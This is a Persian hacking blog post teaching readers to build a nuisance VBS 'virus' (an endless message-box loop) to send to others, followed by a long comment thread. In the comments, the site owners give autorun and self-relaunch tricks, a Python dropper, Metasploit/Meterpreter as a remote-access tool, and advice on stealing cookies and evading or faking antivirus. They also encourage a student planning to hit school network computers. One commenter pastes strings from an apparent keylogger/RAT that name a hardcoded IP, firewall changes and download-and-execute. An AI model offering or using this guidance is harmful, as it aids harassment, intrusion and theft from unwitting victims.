ساخت یک ویروس :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

ساخت یک ویروس سرکاری و اعصاب خورد کن

خوب حالا کد های زیر رو در یک نوت پد کپی کنید :

do
x=msgbox("Killer 32")
loop
باز هم میگم که کپی کنید کد ها رو
می تونید به جای Killer32 متن دیگه ای بزارید و هم می تونید خط دوم رو کپی کنید و به جای Killer32 یک متن دیگه ای بزارید یعنی با این کار دو تا متن دارید
به عنوان مثال یک متن (سلام) و یک متن (چطوری ؟) رو دارید .
و در آخر با فرمت vbs سیو کنید
آموزش تغییر دادن فرمت

و می تونید آپلودش کنید و به کسی که می خواید اذیتش کنید بدید
و برای غیر فعال کردن کلید های Ctrl + Alt + Delete
و start task manager رو انتخاب کنید و در پنجره ی باز شده processes رو انتخاب کنید و روی wscript.exe کلیک کنید و بعد هم روی end process و از شما یک سوال می پرسه و شما دوباره روی end process کلیک کنید .


نویسنده :            Killer_32

نظر (۸۱)

شاید سوالم خیلی چرت و ابتدایی باشه :-(
ولی چطور ویروس رو بدیم طرف؟؟؟
Virus32 killer 32 :
نه سوال هستش دیگه
شما اینو آپلود می کنید
لینکشو میدید به دوستون یا هر کس دیگه ای و و قتی که اون دانلود کنه و بازش کنه دیگه نمی تونه ببندش مگر با همون روشی که گفتم :)
اسمش ویروسه اما برا شوخیه
موفق باشید

خوب بود ! فقط ...
راستی اگه تونستید چن تا Rat و آموزش ساخت و کار باهاش رو کامل بزارید.
Sub7 اگه باشه خیلی خوب میشه :D
Virus32 killer 32 :
خواهش می کنم و فقط چی ؟
فکر نمی کنم داخل آموزش چیز مبهمی گفته باشم .

چند وقته دنبال ای پی فاکر و ای پی فلود هستم ولی پیدا نمیکنم ممنون میشم برا نصب بزاری داداش
  • Virus32
  • داداش نخود
  • سلامممممممممم من دوباره اومدم مزاحم بشما خخخ

    دادا ویروس ادرس میدی اینو اپلود کنم تو ونجا :) میخوام دوستمو بهم بریزم


    :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :) :)

    :-)
    Virus32 Virus 32 :
    من بیشتر اینجا آپلود میکنم ;)
  • Virus32
  • داداش نخود
  • خخخ حال داد رو واسه خودم امتحان کردم واقعا ************* خخخ ایول دادا ویــــــــــــــــــــــــرس
    Virus32 killer 32 :
    عزیز من ویروس نیستم ، کیلر هستم ;)
    سلام دادا مطالبت خیلی خوب بود ولی من هنوزم این تغیر فرمت رو نتونستم انجام بدم اگه کمکم کنی ممنون میشم
    Virus32 Virus 32 :
    سلام عزیز این پست رو بخون اگه بازم متوجه نشدی زیر همون پست بهم بگو کجای کار مشکل داری
    سلام ممنون که جواب دادی اون مشکلم حل شد ولی چرا باز نمیشه؟
    Virus32 Virus 32 :
    سلام
    چی باید باز شه؟ این کد یه متن اخطار نمایش میده که هرچقدر هم ok بدین باز هم ادامه خواهد داشت
  • Virus32
  • داداش نخود
  • دادا یه بار میشد فقط؟ خخخخخخخ دوباره کردم

    دیگه درست نمیشه گگگ خخخخخخ
    Virus32 Virus 32 :
    :) :◄
    سلام
    میشه لطفا روش ساخت ویروس تروژان هم یاد بدید؟
    ممنون
  • Virus32
  • محمد حسینی
  • یه سوال من وی بی اس را غیر فعال کردم حالا چجوری فعالش کنم یعنی کدای وی بی اس دیگه اجرا نمیشه لطفا برام توضیح بدین مرسی.
    خواهش میکنم
    Virus32 Virus 32 :
    متوجه منظورت نمیشم
    یکم بیشتر توضیح بدین
  • Virus32
  • محمد حسینی
  • سلام لطفا توضیحش رو بدید که چه جوری وی بی اس را فعال کنیم
    من غیر فعالش کردم حالا توضیح فعال سازی وی بی اس هم بدید مرسی
    Virus32 Virus 32 :
    سلام باید دوباره روش کلیک کنی
    برای فعال شدن مخفی تو کامنت های فایل های بت توضیح دادم
  • Virus32
  • محمد حسینی
  • نه صفحه باز نمیشه
    اصلا کد اجرا نمیشه ارور میده
    نام ارور هست
    windows script host
    Virus32 Virus 32 :
    این اخطار رو اکثر ویندوز ها بعضی وقتا نشون میدن
    بحثش طولانیه تو یه پست جدید توضیحش میدم
    سلام لطفا آموزش ساخت رات یا ویروس اندروید که مثل کیلاگر میمونه اما برای اندروید هست رو اگه زحمتی نیست یاد بدید خیلی ممنون
    :))))))))
    میخوام یه روزی... احتمالا آخرای اسفند... این "شوخی" یا چیزی شبیه به اینو رو سیستم های مدرسه اجرا کنم!
    ولی شبکه هستند. دسترسی به سیستم ادمین هم دارم... چیکار کنم کل کامپیوترها باهم اینجوری بشن؟ و حتی با- از نت ساپورت درآوردن هم بقیه سیستم ها درست نشه؟ و برای روبراه کردن همشون از همون راهی که گفتی استفاده بشه؟
    یا اینکه اصلا همچین چیزی نمیشه؟ و اگه از نت ساپورت خارج بشن بقیه سیستم ها، فقط سیستم ادمین باید روبراه شه؟
    (برای برگزار نشدن امتحانا نمیخواما!!! من بچه درس خونم!!! میخوام یه شیطونی بدون خرابکاری کنم!!! تو دردسر نیوفتم صلوات!!! اگرم بهم نگی، میرم از یکی دیگه میپرسم! (البته یکم جای خالیه منت میزاره!!!) اگه بالاخره همه چی ردیف شد... شاید گستره شیطونیمو یکم افزایش دادم!!! و کل سیستم های شبکه شده مدارس منطقه 7 تهرانو دادم هوا!!! خخخ خل شدم. ولی نه جدی میشه اصلا اونجوری که من گفتم یا نه؟)
    تچکر شدید:) برای همه چیز (و هیچ چیز!)
    Virus32 Virus 32 :
    اتفاقا من خودم از این کارا زیاد میکردم ولی نه با این ویروس
    اونموقع تکه کد بلستر معروف بود و ....
    برای دسترسی به سیستم های شبکه بهتره رو نرم افزاری که الان روش نصبه کار کنی (منظورم نرم افزار شبکه است)
    زمان ما تیناسوفت ایزی کافی بود اکثر سیستم ها
    ببین نرم افزارش چیه بعد توی نت جستوجو کن کار کردن باهاش رو یاد بگیر اگه به سیستم اصلی دسترسی داشته باشی نیازی به هک نداری خود نرم افزارش کمکت میکنه
  • Virus32
  • Dλгκπεss☠λπɢεl
  • رو سیستم خودم امتحان کردم خیلی باحال بود بعدش از کار انداختمش دمت گرم :_)
    داداش من یه ویروس برای اندروید میخوام
    Virus32 Virus 32 :
    فعلا ندارم
    سلام و خسته نباشید
    من چندتا ویروس میخوام
    اگه زحمت بکشی بیایی تلگرامم فدات میشم
    mesatanme@
    خاکتونم به مولا موفق باشید
    یاحق
    Virus32 Virus 32 :
    سلام عزیز ممنون
    سعی ام رو میکنم بیام ;)
    داش کیلر خسته نباشی♥
    چجوری اینو برا گوشی درس کنم؟ :)
    داداش یه کاریش میکنی که سیستم که روشن شد نرم افزار اجرا بشه؟
    دمد گرم♥♥♥
    درود خسته نباشید پرسشی داشتم این ویروس رو گوشی هم کار میکنه

    Virus32 Virus 32 :
    درود
    خیر
    salam dada.man ino dorost kardam vali sari safe baz mishe baz baste mishe.chizi neshon dade nashod
    ها یادش به خیر داشتم وی بی می نوشتم بعد اون فرمان نوشتار اند رو فراموش کردم اینطوری شد اینو گفت که بگم:
    خیلی ابتدایی هست |:
    سلام داش سایتت عالیه..ممنون میشم ویروس اندروید هم بزاری
    من دکمه کنترل صفحه کلیدم کار نمیکنه روش دیگه ای نیس؟؟دهنم سرویس شد :( ممنون از سایت خوبتون لطفا کمک کنین
    Virus32 Virus 32 :
    روی نوار وظیفه کلیک راست کن
    Task manager رو انتخاب کن و بقیه مسیر رو هم که تو متن توضیح دادم
    بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
    به چنل ما هم یه سر بزنید چیزای جالبی داره
    http∶//tele************************_one
    سلام داداش من هر کاری میکنم نمیتونم فرمت regرو پیدا کنم ..میشه راهنمایی کنید
    Virus32 Dark Killer :
    اگه منظورت اموزش های reg هست که توی فهرست موضوعات هست
    سلام.من چن بار رو سیستمم امتحان کردم ولی اخرین بار خاسم غیرفعال کنم وقتی رفتم به پروسس اشتباهی winlogon.exeرو زدم الانم دیگه کیبوردم کار نمیکنه.در ضمن کیبوردو ب یه سیستم دیگه وصل کردم سالمه.سیستم من هیچ کیبوردیو بالا نمیاره.لطفا راهنمایی کنین.
    Virus32 Virus 32 :
    سلام
    winlogon ربطی به کیبورد نداره
    ویروسی که به کمک این برنامه کار میکنه هم کیبورد رو غیر فعال نمیکنه (BronTok)
    ریجستری رو چک کن ببین کیبورد غیرفعال نشده باشه
    این پست رو بخون
    دادا میگم موضوع هامون شبیه همه
    اشکال نداره کد باکس هامون عین هم باشه؟
    Virus32 Virus 32 :
    نه عزیز اشکال نداره
    بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
    سلام داداش کارت درسته من 13سالمه و...بیا اکانت تلگرامم که یه فرصت خوب در انتظارته
    @h********1
    ببخشید این ویروس ها چجوری اجرا میشه؟
    Virus32 MR_C0D3R ‌ :
    بعد از اینکه روشون کلیک کنی (:
    سلام
    ویروس ضعیفیه ولی برای سوخی خوبه
    میشه توضیح بدید این ویروس رو با فایل autorun.inf چطور باز کنیم؟
    Virus32 MR_C0D3R ‌ :
    سلام
    همونطور که گفتی ساده اما رو اعصاب برو
    فایل های Vbs رو نمیدونم بشه توی اتوران قرار داد یا نه (تست نکردم)اما در کل به شکل پایینه اجرا شدنشون
    [autorun]
    open=test.vbs

    میتونیم این فایل رو اول به Exe تبدیل کنیم بعدا با اتوران درستش کنیم یا اینکه اگه میخوای همین یه تیکه کد ساده باشه بگو کد Bat اونو بگم چون میدونم که میشه فایل های Bat رو با اتوران اجرا کرد اما Vbs رو ...
    ضمنا اینروزا بخاطر امنیت سیستما دیگه فکر نکنم اتوران جواب بده ، فوق فوقش روی ویندوز های اکس پی و ... جواب بده
    یه ویروس ساختم اسمشو گذاشتم ترمیناتور ریختم تو کامپیوتر معلممون صفحه مرگ ظاهر شد بعد سوخت خخخخ. با همین ویژوال بیسیک اسکریپت نوشته بودمش
    خوب بود
    یه ویروسم هست که وقتی روش کلیک کنی مدام cmd رو باز میکنه انقدر که دیوونه میشی تنها ترین راه بستنش رستارت کردنه باید تو نوت پد دستور
    star m.bat رو وارد کنید و با فرمت bat ذخیرش کنین خیلی باحاله رو خودتون امتحان کنین
    سلام ویروس جان

    خیلی مطالب عالی هستن
    ببخشید شاید یکم بی مورد باشه
    ولی
    یه سوال داشتم
    میشه در پایتون کاری کرد که این برنامه اجرا بشه؟
    اگر جوابو ایمیل کنی ممنونت میشم
    بوس بوس
    بای
    Virus32 MR_C0D3R ‌ :
    سلام
    بی ربط چیه ... سوال تو شرف داره به سوالای دیگه ;)
    import os

    file = open("ViRus.vbs","w")
    file.writelines("do\n\tx = MsgBox(\"Http://virus32.blog.ir\")\nloop")
    file.close()

    os.system("Start ViRus.vbs")

    من حدود دوازده تا ایمیل دارم الان پسوورد هیچکدومش یادم نیس :-(
    الان هم میخوام عضو شم نمیتونم :-(
    نت من هم خیلی ضعیفه نمیتونم یه ایمیل دیگه درست کنم :-(
    چیکار کنم؟

    سلام برای نوشتن ویروس در vb6 میخواستم بدونم برای قسمتی ک یه ویروس باید تکثیر و منتشر بشه و خودشو کپی کنه در درایوهای مختلف.از چه کدی استفاده کنم.از تابع copyfile استفاده کردم اما عمل نمیکنه نمیدونم چرا

    سلام خوبی داداش
     میشه در پایتون 2.7 کدی نوشت که هر انتی ویروسی تو سیستم باشه   بعد اجرای  کد  انتی رو پاک کنه؟

    سلام

    چجوری یه کاری کنم که وقتی روی ok کلیک کرد دو بشه؟

    Virus32 32 Attacker ‌ :
    سلام، منظورتو نفهمیدم، چی دو بشه؟

    منظورم اینه که دوتا بشه  (پیامی که نمایش داده میشه)

     

    Virus32 Virus 32 :
    لوپ رو بردار
    خط دوم رو کپی کن و متن بعدی رو بنویس

    سلام در برنامه نویسی html هم کدی هست که مخرب باشه ؟

    Virus32 Attrib32 32 32 :
    Virus32 Virus 32 :
    نه
    html اصلا زبان برنامه نویسی حساب نمیشه

    البته فکر نکنم html بشه

    من هر کاری کردم نتونستم پیدا کنم در این مورد خیلی وقته دنبالش میگردم

    اما با js میشه به نظرم

    Virus32 Virus 32 :
    با js میشه یه کارهایی کرد

    چی خوب هست ؟

     

    Virus32 32 Attacker ‌ :
    برای کارهای خوب خوب (مخرب) توو ویندوز، سی پلاس و سی شارپ بسیار خوب هست، پایتون هم هی بد نی D: (الان حرص اتریب درمیاد D: )

    آدم تو پایتون راحت تره ولی محدوده. چون کلی کتابخونه هست و اینا. اما تو C سخته ولی هر کاری بخوای میتونی بکنی

    Virus32 32 Attacker ‌ :
    دست شوما درد نکونه ;)

    من خودم html,css,php,js v رو بلدم بیشتر تو کار تحت وبم ولی پدرم c++  #c  با چند تا چیز دیگه بلد هست ولی تو کار هک نیست راستی شما  تو دارک وب هم رفتید ؟

    Virus32 32 Attacker ‌ :
    آورین ;) 
    نه رفتیم دارک وب دیدیم خیلی تاریکه :( برگشتیم اومدیم وب خودمون D:

    ok 

    اگه رمز مطالب تون رو ارسال کنید ممنون می شوم

     

    Virus32 32 Attacker ‌ :
    دوبار درخواست رمز دادی که :(
    مگه دفعه قبل ارسال نشد؟

    نه من توی اسپم رفتم نبود

    بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است

    می شه به این ایمیل بفرستید ********************

    دو تا ایمیل دارم فرقشون تو حرف اوله

    Virus32 32 Attacker ‌ :
    به اون ایمیلت ارسال شد، چون سیستم ما یجوریه با هرایمیلی که توو بخش رمز مطالب درخواست بدی به طور خودکار به همون ارسال میشه :(

    سلام چی کار کنم زمانی که روش کلیک شد چند بار اجرا بشه ؟

    Virus32 Attrib32 32 32 :
    اینم بزار تو کد خودت
    Start %0

    خیییییلی ممنون

    Virus32 32 Attacker ‌ :
    خواهش می شود

    عاقا سلام

    یه سوال داشتم

    ببینید

    یه ویروسی تو appdata/roaming کامپیوترم یافتم

    زیادی خطریه. این یه خطشه که بهش مشکوکم :

     

      C W  I 0  K F  M W CO e CQ ~ CS گ €                3              '                #‰               ”               n                #؛       <Module> System.Runtime.CompilerServices CompilationRelaxationsAttribute .ctor RuntimeCompatibilityAttribute System Object Microsoft.VisualBasic.CompilerServices StandardModuleAttribute System.IO FileInfo FileStream Microsoft.VisualBasic.Devices Computer System.Net.Sockets TcpClient MemoryStream Conversions ToBoolean System.Reflection Assembly GetEntryAssembly get_Location Byte Exception Microsoft.VisualBasic.MyServices RegistryProxy ServerComputer get_Registry Microsoft.Win32 RegistryKey get_CurrentUser String Concat OpenSubKey DeleteValue ProjectData SetProjectError ClearProjectError RuntimeHelpers GetObjectValue GetValue RegistryValueKind CreateSubKey SetValue DateTime Operators ConditionalCompareObjectEqual ToString Environment get_MachineName get_UserName FileSystemInfo get_LastWriteTime get_Date ComputerInfo get_Info get_OSFullName Replace OperatingSystem get_OSVersion get_ServicePack Microsoft.VisualBasic Strings CompareMethod Split SpecialFolder GetFolderPath Contains RegistryKeyPermissionCheck GetValueNames get_Length Convert ToBase64String FromBase64String System.Text Encoding get_UTF8 GetBytes GetString System.IO.Compression GZipStream Stream CompressionMode set_Position Read BitConverter ToInt32 Dispose Space IntPtr Zero op_Equality op_Explicit Interaction Environ Conversion Hex Module Type Load GetModules GetTypes get_FullName EndsWith get_Assembly CreateInstance DirectoryInfo get_Name ToLower CompareString get_Directory get_Parent get_LocalMachine AppWinStyle Shell File Delete DeleteSubKey EndApp System.Threading Thread Sleep Exists FileMode ReadAllBytes Write Flush Close System.Diagnostics Process Start EnvironmentVariableTarget SetEnvironmentVariable Copy System.Net WebClient System.Drawing Graphics Bitmap Rectangle Size ConcatenateObject get_Chars ToArray DownloadData Path GetTempFileName WriteAllBytes get_Message NewLateBinding LateSet LateCall Boolean LateGet CompareObjectEqual OrObject System.Windows.Forms Screen get_PrimaryScreen get_Bounds get_Width get_Height System.Drawing.Imaging PixelFormat Image FromImage CopyPixelOperation CopyFromScreen Cursor Cursors get_Default Point get_Position Draw ToInteger DrawImage ImageFormat get_Jpeg Save WriteByte RuntimeTypeHandle GetTypeFromHandle ChangeType System.Security.Cryptography MD5CryptoServiceProvider HashAlgorithm ComputeHash GetCurrentProcess get_Handle Monitor Enter Int32 Socket get_Client SocketFlags Send Exit set_ReceiveBufferSize set_SendBufferSize set_SendTimeout set_ReceiveTimeout Connect get_Available SelectMode Poll NetworkStream GetStream ReadByte ToLong ChrW Char Receive ParameterizedThreadStart Join Command Mutex ThreadStart SessionEndingEventArgs SessionEndingEventHandler SystemEvents add_SessionEnding Application DoEvents set_MinWorkingSet ConditionalCompareObjectNotEqual CompilerGeneratedAttribute DebuggerStepThroughAttribute STAThreadAttribute Keys StringBuilder GetProcessById get_MainWindowTitle DateAndTime get_Now get_ProcessName Enum Keyboard get_Keyboard get_ShiftKeyDown get_CapsLock ToUpper get_CtrlKeyDown Remove j.exe avicap32.dll kernel32 user32.dll user32 ntdll mscorlib OK j kl A VN VR MT EXE DR RG H P Y BD Idr IsF Isu LO FS F kq Cn sf C MeM b lastcap PLG .cctor NtSetInformationProcess hProcess processInformationClass processInformation processInformationLength capGetDriverDescriptionA wDriver lpszName cbName lpszVer cbVer GetVolumeInformation GetVolumeInformationA lpRootPathName lpVolumeNameBuffer nVolumeNameSize lpVolumeSerialNumber lpMaximumComponentLength lpFileSystemFlags lpFileSystemNameBuffer nFileSystemNameSize GetForegroundWindow GetWindowText GetWindowTextA hWnd WinTitle MaxLength GetWindowTextLength GetWindowTextLengthA hwnd DLV n GTV ret STV t typ inf ENB s DEB SB S BS B ZIP Cam ACT HWD Plugin c ED CompDir F1 F2 UNS INS Ind md5 pr i Sendb connect RC ko _Lambda$__1 a0 _Lambda$__2 a1 LastAV LastAS lastKey Logs vn ToUnicodeEx a d e f g GetKeyboardState MapVirtualKey GetWindowThreadProcessId GetKeyboardLayout GetAsyncKeyState AV VKCodeToUnicode Fix k WRK main   U H l 0 a G 9 u      0 . 7 d  ?7¾8& 7± :R8  6 8¾ 7§ :R7¾8ئ8    7³ 7± :R5 A p p D a t a  Ab b 4 a d d e d 3 c a a f a 3 6 a e 4 e 0 4 0 5 c 4 5 c 9 9 f b  1 9 2 . 1 6 8 . 4 2 . 3 7  4 4 3  | ' | ' | F a l s e      T r u e  [S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n  S o f t w a r e \  l l  v n  _  ? ?  y y - M M - d d ? ? - ? ? - ? ? M i c r o s o f t  W i n d o w s  W i n  ® "!              W i n  S P  0  x 8 6        x 6 4        x 8 6  Y e s  N o  . .  ,  S y s t e m D r i v e  \  E R R  .  Mn e t s h   f i r e w a l l   d e l e t e   a l l o w e d p r o g r a m   "  "      . e x e  S o f t w a r e  =c m d . e x e   / c   p i n g   0   - n   2   &   d e l   " +S E E _ M A S K _ N O Z O N E C H E C K S  1  Gn e t s h   f i r e w a l l   a d d   a l l o w e d p r o g r a m   "  "   "  "   E N A B L E      "   . .  k l      p r o f  ~  !  g e t v a l u e  @  r n  M S G  E x e c u t e   E R R O R  b l a  D o w n l o a d   E R R O R  E x e c u t e d   A s    E x e c u t e   E R R O R    i n v  p l  A  h  p  o s k  s t a r t  O f f  o f f  r e t  G T  C A P  u n  u p  U p d a t e   E R R O R  U p d a t i n g   T o    U p d a t e   E R R O R    E x  P L G  i n d  H  P  c  E R  x 2   

    بعد یه سوال دیگه

    اینو نگه دارم یا اینکه حذفش کنم؟

    اگه نگه دارم مهندسی معکوس یه سوال کجا بندازمش دیگه هیچ غلطی نتونه بکنه؟؟

    ممنون میشم

    راستی سانسورش نکنید تورو خودا جواب بودین:)

    آخرین مودیفای هم ساعت 11 صبح روز 2020/02/21 بوده

    ممنون :)

    Virus32 32 Attacker ‌ :
    داش کیلر این به چه زبونیه؟ D:
    فک کنم یه چینی واست پیغام گذاشته D:

    Virus32 Virus 32 :
    ویژوآل بیسیکه داداشی
    یه ترفند خوب که میشه از این کدها یاد گرفت اینه که ...
    کدهای ویروس رو تو رشته قرار داده و بین حرف هاش فاصله گذاشته
    از آنتی ویروس که رد شد با یه حلقه ی کوچیک فاصله هارو حذف میکنه و چرت و پرت های درون رشته تبدیل به دستورات مخرب میشن
    بعد مقدار رشته رو کامپایل میکنه! که تبدیل به ویروس میشه
    یادمه یه پست درمورد ساخت کامپایلر نوشته بودم ....... این یه نمونه از اون مدل
    —————————؟
    ایمان آوردن به ویروس از کار های روزانه منه D:
    اتریب

    ببخشید منم می تونم تو سایتتون نویسنده باشم

    Virus32 Virus 32 :
    متاسفانه نمیشه دوست عزیز!

    خیلی ممنون راستی یه سوال داشتم ببخشید که بی ربطه من خودم وبلاگ دارم چند نفر مطالب مهمم رو کپی کردن برنامه ای هست که ip  یه نفر رو بدید و شمارشو بهم بده ؟یا خودتون می تونید این کار رو انجام بدبد ؟

    Virus32 Virus 32 :
    بله
    خیلی وقت پیش قرار داده بودم نمیدونم الان هست یا نه
    تو نرم افزارهای هک رو بگرد باید باشه
    داشی درگیر این کپی شدنا نباش وقتت حروم میشه
    چند تا پستت رو کپی کردن؟ باور کن من اینجا عطسه میکنم ده نفر کپی میکنن
    پستای آموزشی که هیچ فدای سرشون حتی دلنوشته هامم کپی میکنن! هنوز نمیدونم چرا! :(
  • Virus32
  • سمانه اعیانی
  • بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است

    سلام

    می خواستم یک فایل bat بسازم که پشت یک فایل rar مخفی بشه و این فایل را با ایمیل به کامپیوتر مقصد ارسال کنم و کاربر مقصد با باز کردن فایل rar فایل bat اجرا بشه و  فایل bat اجرا شده هم حاوی این دستور باشه که بیاد یک فایل یا یک فولدر را از یک درایو برداره و به همان ایمیلی که فایل rar را فرستاده بود ارسال بشه. اگه میشه به ایمیلم ********************** ارسال کنید

    و اینکه بگید از کجا رمز مطالب را باید بدست بیاریم تا بتونیم از مطالبی که گذاشتید استفاده کنیم

    Virus32 Attrib32 32 32 :
    بایندرها
    مطلب رمز مطالب

    سلام

    Virus32 ولم کنید (: :
    علیکم و سلام

    سلام

  • Virus32
  • محمد علی ابراهیمی
  • سلام یک سوال داشتم ایا وقتی یک ترویجان رو روی یک سیستم نصب میکنیم و باهاش کروم رو باز میکنم اون شخص می فهمه

    Virus32 MR_C0D3R ‌ :
    سلام
    بستگی به نیاز برنامه نویس داره
    به عنوان مثال من نیاز دارم که از وبکم قربانی دسترسی بگیرم
    در نتیجه نمیام دستور بدم نرم افزار های در حال اجرا یا نرم افزار هایی که جدیدا اجرا شدن رو اسمشون رو برام ارسال کنه
    اما توی بیشتر ریموت کنترل هایی که دیدم بیشترشون این قابلیت رو داشتن که بتونن اینکار رو انجام بدن
  • Virus32
  • محمدعلی ابراهیمی
  • یعنی نمیشه با ترویجان بدون که شخص متوجه بشه وارد کروم بشم وا وارد یک سایت بشم و اطلاعات اون را تغییر بدم و اگر نمیشه باید با چه روشی اینکار را انجام بدم؟

    Virus32 ولم کنید (: :
    چرا میشه... اگه کدش رو بزاری چرا نشه اخه ؟ :|
    مثلا میتونی کوکی هاش رو انتقال بدی واس خودت حالا با API یا به صورت مستقیم با آیپیت در ارتباط باشه.
    فک کنم منظور تو یه چیزی عین بات نت باشه بخوای یه جایی رو هک کنی ولی با سیستم قربانی ... اونم میشه ولی نه با کروم  :| باید خودت با سایت ارتباط بگیری... تو پایتون با requests میشه و تو سی شارپ با net و web ...
    *ترویجان نه تروجان => trojan
  • Virus32
  • محمد علی ابراهیمی
  • از چه راتی استفاده کنم

    Virus32 ولم کنید (: :
    متا اسپلویت،  METERPRETER
  • Virus32
  • محمد علی ابراهیمی
  • باید چیکار کنم رات با انی ویروس قابلیت شناسایی نداشته باشه

    Virus32 ولم کنید (: :
    اون خودش یه دنیاییه...

    عاقا اسکن تایم آنتی ویروس گیر نمیده. رانتایم یکم مشکل هست. رانتایم از subprocess استفاده میکنم.

    رانتایم و چوکولم؟؟

    ایده ای که داشتم اینه : هر وقت توی پروسه های باز اسم آنتی ویروسه بود هیچ قلطی نکنه

    اگر نداشت گند بزنه به سیستم

    ولی فهمیدم مشکلی که هست اینه چیزی مثل دیفندر خود ویندوز 10 که توی کرک شده هاش رایگان هست 24 ساعته داره چک میکنه

     

    راستی. آنتی ویروس شید رو میشناسین؟؟ خوبه؟؟ در مقابل این ویروسای ما میتونه چه قدر مقاتوم باشه؟ ایرانیه :||

    Virus32 ولم کنید (: :
    سلام
    *این روش جواب نمیده
    علت => انتی ویروس ممکنه تو هر نسخه یه اسم داشته باشه تازه ممکنه اصلا یه برنامه با اون اسم باشه!!
    راه حل => تو باید چک کنی کسی فایل ویروست رو باز کرد که بخواد بخونتش تو فعالیت خودت رو متوقف کنی، در ضمن یه دیسک نجات کل ویروست رو حل میکنه(:
  • Virus32
  • محمد علی ابراهیمی
  • سلام چطور میتونم یک انتی ویروس رو یک جور از کار بندازم که شخص فکر کنه داره کار میکنه ولی اسکن نکنه؟

    Virus32 32 Attacker ‌ :
    باید یه آنتی ویروس شکل همون آنتی ویروس قربانیت بنویسی و سفارشی درستش کنی و بعد باید بهش نفوذ کنی و آنتی ویروس خودش رو از استارت آپ (ران ریجستری) پاک کنی و به جاش آنتی ویروس خودت رو قالب کنی D:
    بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است

    تو با c# داری ویروس می نویسی ؟

    ویروس اندروید با جاوا اسکریپت بلدی بنویسی ؟

    ******************

    *********

    منتظرم

    Virus32 ولم کنید (: :
    نه هیچ کدومو بلد نیستیم متاسفانه!

    سلام . کیلر میشه اینو توی اندروید هم توضیح بدی . یه همچین چیز با حالی برا همکلاسی ها بفرستم . من به جاوا اسکریپت مسلط نیستم .😁

    داداش چجوری اینجا ثبت نام کنم؟؟؟

    سلام

    برای اینکه دوتا متن داشته باشیم باید ( "x=msgbox( ”killer32 رو قبل از loop کپی کنیم و متن دوم رو بنویسیم یا بعد از loop کپی کنیم و بعد از متن یه loop دیگه بنویسیم؟

    Virus32 ولم کنید (: :
    بعد لوپ بنویسی همش تکرار میشه دیگه میوفته تو حلقه...

    ینی قبل از لوپ باید بنویسی؟

    سلام خوبی

    من عاشق اینم که وارد دنیای هک و امنیت بشم ولی نمیدونم از کجا شروع کنم چی یاد بگیرم از کجا یاد بگیرم 

    خیلی دمت گرم اگه بهم فقط یه راهتمایی کنی بگی من از کجا شروع کنم چی باید یاد بگیرم بقیه راهو میرم 

     

    ایمیلم هم دادم 

  • Virus32
  • ilia علیزاده
  • سلام باز هم ایلیا هستم میخواستم بگم من اون کد

    do
    x=msgbox("Killer 32")
    loop

    کردمش 

    do
    x=msgbox("Killer 32",2)
    loop

    چیز خوبی شد اومد چند تا گزینه بهش اضافه کرد

     

    من روokمیزنم خودش بسته میشه

    چرا؟

    Virus32 MicRoB 32 :
    یه جاشو اشتباه نوشتی 

    میشه این ویروس رو روی اندروید هم ساخت؟

    Virus32 MicRoB 32 :
    نه
    قبل ارسال کامنت یه بار فکر کنین با خودتون ببینین که اصن پسوند فایل های اندرویدی شبیه پسوند این فایل ماست؟
    :(((((
  • Virus32
  • ☬ᦔ𝕣 ✞ ꪜⅈ𝕣ꪊડ☬
  • بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است

    اقا میشه این ویروس رو درست کنی

    سلام😈♧  ◥ a.  ◥ a.  ◢      ◥◢   ◢      ◥ a.  ◢      ◥

    و برای به این ********************** ممنون میشم خواهشا❤

    سلام خوبی؟ چه خبر؟

    ببین من این کد ها رو درست کردم که دوستم یکم بترسونم

    cls

    :A

    color 0a

    cls

    @echo off

    echo Wscript.Sleep

    echo Wscript.Sleep 5000>C:sleep5000.vbs

    echo Wscript.Sleep 3000>C:sleep3000.vbs

    echo Wscript.Sleep 4000>C:sleep4000.vbs

    echo Wscript.Sleep 2000>C:sleep2000.vbs

    cd %systemroot%System32

    dir

    cls

    start /w wscript.exe C:sleep3000.vbs

    echo Deleting Critical System Files…

    echo del *.*

    start /w wscript.exe C:sleep3000.vbs

    echo Deletion Successful!

    start /w wscript.exe C:sleep2000.vbs

    echo:

    echo:

    echo:

    echo Deleting Root Partition…

    start /w wscript.exe C:sleep2000.vbs

    echo del %SYSTEMROOT%

    start /w wscript.exe C:sleep4000.vbs

    echo Deletion Successful!

    start /w wscript.exe C:sleep2000.vbs

    echo:

    echo:

    echo:

    echo Creating Directory h4x…

    cd C:Documents and SettingsAll UsersStart MenuPrograms

    mkdir h4x

    start /w wscript.exe C:sleep3000.vbs

    echo Directory Creation Successful!

    echo:

    echo:

    echo:

    echo Execution Attempt 1…

    start /w wscript.exe C:sleep3000.vbs

    echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x

    echo start hax.exe

    start /w wscript.exe C:sleep3000.vbs

    echo Virus Executed!

    echo:

    echo:

    echo:

    start /w wscript.exe C:sleep2000.vbs

    echo Disabling Windows Firewall…

    start /w wscript.exe C:sleep2000.vbs

